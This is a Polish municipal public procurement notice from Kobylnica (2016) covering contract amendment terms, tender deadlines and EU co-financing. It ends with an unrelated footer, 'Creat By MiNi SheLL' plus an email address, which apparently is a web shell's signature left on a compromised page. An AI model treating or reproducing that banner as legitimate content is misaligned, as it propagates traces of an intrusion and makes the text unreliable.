<p>1.	Zgodnie z treścią art. 144 ust. 1 ustawy Zamawiający przewidział w SIWZ możliwość dokonania zmiany umowy zgodnie z postanowieniami wzoru umowy (Załącznik Nr 8 do SIWZ).
2.	Wniosek z propozycją zmiany treści Umowy złożony przez jedną ze Stron winien zawierać określenie zmiany, uzasadnienie zmiany oraz czasu wykonania zmiany.
3.	Zmiana postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy jest możliwa w przypadkach opisanych poniżej, z zastrzeżeniem, iż zmiany te nie wykraczają poza określenie przedmiotu zamówienia określonego w SIWZ oraz Strony Umowy wyraziły zgodę na wprowadzenie zmian, tj.:
1)	zmiany dotyczą osób wskazanych w § 6 Umowy, w uzasadnionych przypadkach i na wniosek Wykonawcy i za uprzednią zgodą Zamawiającego wyrażoną na piśmie pod rygorem nieważności, pod warunkiem, że wskazana przez Wykonawcę osoba będzie spełniała warunki określone w SIWZ. Jakakolwiek przerwa w realizacji przedmiotu Umowy wynikająca z braku personelu będzie traktowana jako przerwa wynikła z przyczyn zależnych od Wykonawcy i nie może stanowić podstawy do wydłużenia terminu realizacji przedmiotu Umowy;
2)	zmiany dotyczą terminu realizacji przedmiotu Umowy w przypadku:
a)	przestojów w realizacji przedmiotu Umowy niezawinionych przez Wykonawcę, o czas trwania przestoju,
b)	przedłużających się procedur związanych z wykorzystaniem przez Wykonawców środków ochrony prawnej w zamówieniach publicznych lub innych procedur zamówień publicznych, 
c)	konieczności zaspokojenia oczekiwań osób trzecich, w tym grup społecznych 
lub zawodowych, nie artykułowanych lub niemożliwych do jednoznacznego określenia 
w chwili zawierania Umowy,
d)	przedłużających się procedur związanych z uzyskaniem wszelkich wymaganych decyzji, pozwoleń i innych uzgodnień wymaganych na podstawie odrębnych przepisów, w tym wynikających z nałożenia obowiązku przeprowadzenia oceny oddziaływania przedsięwzięcia na obszar Natura 2000,
e)	wydania lub zmiany decyzji, postanowień lub innych aktów administracyjnych mających wpływ na wykonanie przedmiotu Umowy, 
f)	uzasadnionych przestojów lub opóźnień spowodowanych przez Zamawiającego - o ile okoliczności te powodują konieczność zmiany terminu i zmiany w tym zakresie będą dokonane, z uwzględnieniem okresów niezbędnych do przesunięcia terminu wykonania Umowy,
g)	wystąpienia okoliczności siły wyższej np.: wystąpienia, zdarzenia losowego wywołanego 
przez czynniki zewnętrzne, którego nie można było przewidzieć w chwili zawarcia Umowy, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu lub grożącego powstaniem szkody o oznaczonych rozmiarach,
h)	w sytuacji określonej w § 3 ust. 3 Umowy,
3)	zmiany podmiotów trzecich na etapie realizacji Umowy, na zasobach których Wykonawca opierał się wskazując spełnianie warunków udziału w postępowaniu, z zastrzeżeniem, że spełnione są warunki udziału w postępowaniu określone w SIWZ,
4)	zmiany zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy,
5)	wprowadzenia rozwiązań zamiennych powodujących obniżenie kosztów ponoszonych przez Zamawiającego na eksploatację i konserwację przedmiotu prac projektowych lub poprawiających jego parametry techniczne i efektywność,
6)	zmiany są konieczne w związku ze zmianą przepisów prawa mających związek z realizacją Umowy,
7)	zmiany dotyczą terminów płatności.
4.	Strony mogą w każdym czasie rozwiązać umowę za zgodnym porozumieniem Stron</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.kobylnica.tensoft.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kobylnica, ul. Główna 20, 76-251 Kobylnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2016 godzina 09:15, miejsce: Urząd Gminy Kobylnica, 76-251 Kobylnica, ul. Główna 20
- sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest finansowany z budżetu Gminy Kobylnica oraz planowany jest 
do dofinansowania ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2014  - 2020.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com